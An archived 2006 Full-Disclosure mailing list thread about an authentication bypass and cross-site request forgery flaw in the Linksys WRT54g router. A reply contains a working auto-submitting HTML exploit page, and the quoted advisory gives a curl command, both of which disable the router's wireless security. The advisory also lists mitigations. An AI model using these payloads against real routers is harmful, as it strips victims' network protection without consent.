[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <b7a807650611040355u6a959e1ape9988f3ba527da78@mail.gmail.com>
Date: Sat, 4 Nov 2006 11:55:15 +0000
From: pagvac <unknown.pentester@...il.com>
To: full-disclosure@...ts.grok.org.uk
Cc: Ginsu Rabbit <ginsurabbit@...mail.com>
Subject: Re: linksys WRT54g authentication bypass
Sorry I'm replying to this post after so long, but I was bored this
morning and decided to create a specially-crafted HTML page that would
allow me to replicate the unauth CSRF attack described by Ginsu
Rabbit. Very interesting vuln btw :-)
The following is the code for the specially-crafted HTML page.
Unfortunately, I do not have a vulnerable Linksys router to test this,
so I simply strictly followed the structure of the POST request as
described in the advisory. Hopefully it should work.
It'd be cool if someone could test this against a vulnerable model.
Here is an on-line copy:
http://ikwt.com/projects/linksys/BID19347_test.html
<html>
<head><title>BID 19347 specially-crafted html page - vuln found by
Ginsu Rabbit</title></head>
<body>
<form action="http://192.168.0.1/Security.tri" method="POST">
<input type="hidden" name="SecurityMode" value="0">
<input type="hidden" name="layout" value="en">
</form>
<script>document.forms[0].submit();</script>
</body>
</html>
On 8/4/06, Ginsu Rabbit <ginsurabbit@...mail.com> wrote:
> I'm having some trouble believing this hasn't been reported before. If you
> have a linksys router handy, please check to see whether it is vulnerable to
> this attack. It's possible that all of the linksys router web UIs have the
> same bug. Hopefully the problem is isolated to one particular model or
> firmware revision.
>
> I. DESCRIPTION
>
> Tested product: Linksys WRT54g home router, firmware revision 1.00.9.
>
> Problem #1: No password validation for configuration settings.
>
> The WRT54g does not attempt to verify a username and password when
> configuration settings are being changed. If you wish to read configuration
> settings, you must provide the administrator ID and password via HTTP basic
> authentication. No similar check is done for configuration changes.
>
> This request results in a user-id and password prompt:
> GET /wireless.htm
>
> This request disables wireless security on the router, with no password
> prompt:
> POST /Security.tri
> Content-Length: 24
>
> SecurityMode=0&layout=en
>
> Problem #2: Cross-site request forgery
>
> The web administration console does not verify that the request to change
> the router configuration is being made with the consent of the
> administrator. Any web site can force a browser to send a request to the
> linksys router, and the router will accept the request.
>
>
> II. Exploitation
>
> The combination of these two bugs means that any internet web site can
> change the configuration of your router. Recently published techniques for
> port-scanning and web server finger printing via java and javascript make
> this even easier. The attack scenario is as follows:
>
> - intranet user visits a malicious web site
> - malicious web site returns specially crafted HTML page
> - intranet user's browser automatically sends a request to the router that
> enables the remote administration interface
> - the owner of the malicious web site now has complete access to your router
>
> I'm not going to share the "specially crafted HTML page" at this time, but
> it isn't all that special.
>
>
> III. DETECTION
>
> If your router is vulnerable, the following curl command will disable
> wireless security on your router. Tests for other router models and
> firmware revisions may be different:
>
> curl -d "SecurityMode=0&layout=en" http://192.168.0.1/Security.tri
>
>
> IV. MITIGATION
>
> 1) Make sure you've disabled the remote administration feature of your
> router. If you have this "feature" enabled, anybody on the internet can
> take control of the router.
>
> 2) Change the IP address of the router to a random value, preferably in the
> range assigned to private networks. For example, change the IP address to
> 10.x.y.z, where x, y, and z are numbers between 0 and 255 inclusive. This
> makes it more difficult for an attacker to forge the request necessary to
> change the router configuration. This mitigation technique might not help
> much if you have a java-enabled browser, because of recently published
> techniques for determining gateway addresses via java applets.
>
> 3) Disable HTTP access to the administration interface of the router,
> allowing only HTTPS access. Under most circumstances, this will cause the
> browser to show a certificate warning before the configuration is changed.
>
> V. VENDOR NOTIFICATION
>
> Linksys customer support was notified on June 24, 2006.
> Full disclosure on August 4, 2006.
>
> --
> GR
>
> _________________________________________________________________
> Is your PC infected? Get a FREE online computer virus scan from McAfee(r)
> Security. http://clinic.mcafee.com/clinic/ibuy/campaign.asp?cid=3963
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
--
pagvac
[http://ikwt.com/]
View attachment "BID19347_test.html" of type "text/html" (357 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists